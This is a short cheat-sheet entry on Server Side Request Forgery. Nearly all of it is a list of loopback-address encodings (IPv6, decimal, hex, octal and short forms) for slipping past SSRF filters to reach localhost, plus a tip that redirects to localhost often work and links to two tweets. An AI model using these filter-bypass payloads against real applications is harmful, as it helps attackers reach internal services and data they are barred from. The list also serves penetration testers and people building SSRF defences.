Server Side Request Forgery (SSRF)
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://0x7f000001/
http://017700000001
http://0177.00.00.01
Also using a redirect to localhost will often work.
https://twitter.com/SMHTahsin33/status/1293601681834307584?s=20
https://twitter.com/z0idsec/status/1301145611303940096?s=20
Copy link